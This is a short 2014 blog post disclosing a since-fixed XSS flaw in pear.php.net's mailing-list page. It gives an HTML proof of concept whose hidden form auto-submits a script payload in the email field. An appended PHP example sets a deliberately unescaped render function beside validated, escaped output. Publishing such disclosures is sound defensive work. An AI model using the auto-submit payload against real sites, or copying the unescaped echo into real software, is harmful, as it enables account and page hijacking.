Monday, April 21, 2014
pear.php.net XSS
A long time ago (28.06.2013) I found an XSS bug in http://pear.php.net/support/lists.php. The email parameter was neither validated nor sanitized, which resulted in XSS.
Proof of concept was:
<head>
<script src="http://code.jquery.com/jquery-1.10.1.min.js"></script>
</head>
<body>
<form method="post" action="http://pear.php.net/support/lists.php" id="form" style="display:none">
<input name="maillist[pear-dev]" type="radio" value="normal" checked>
<input type="text" name="email" size="30" value="<script>alert('xss');</script>">
<input type="submit" name="action" value="Subscribe">
</form>
</body>
<script>
$('input[name=action]').click();
</script>
Fixed 08.07.2013.
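For the defensive side of this bug class, the following is an added example, not part of the original post and not pear.php.net's code: it contrasts echoing a submitted email value unchanged with validating it on input and escaping it on output. The function names and the response markup are assumptions, since the post does not show the server-side code.

```php
<?php
// Added illustration; NOT the pear.php.net source. All function names are hypothetical.

// Vulnerable pattern: the submitted value is written into the page unchanged,
// so markup in the "email" field becomes part of the response.
function render_form_field_unsafe(string $email): string
{
    return '<input type="text" name="email" value="' . $email . '">';
}

// Validation step: accept only syntactically valid addresses.
function is_acceptable_email(string $email): bool
{
    return filter_var($email, FILTER_VALIDATE_EMAIL) !== false;
}

// Output step: escape for the HTML context. This is still required after
// validation, because characters such as ' and & are legal in an address.
function render_form_field_safe(string $email): string
{
    $escaped = htmlspecialchars($email, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="email" value="' . $escaped . '">';
}

// Request handling: reject invalid input, and escape whatever is echoed back.
function handle_subscribe(string $email): string
{
    if (!is_acceptable_email($email)) {
        // The rejected value is redisplayed for correction, escaped.
        return "<p>Invalid e-mail address.</p>\n" . render_form_field_safe($email);
    }
    return '<p>Subscription request sent for '
        . htmlspecialchars($email, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</p>';
}

// Sample inputs: the first is the value from the post's proof of concept,
// the other two are constructed for this example.
$samples = [
    "<script>alert('xss');</script>",
    'dev@example.org',
    "o'brien@example.org",
];

foreach ($samples as $value) {
    echo "unsafe: ", render_form_field_unsafe($value), "\n";
    echo "safe:   ", handle_subscribe($value), "\n\n";
}
```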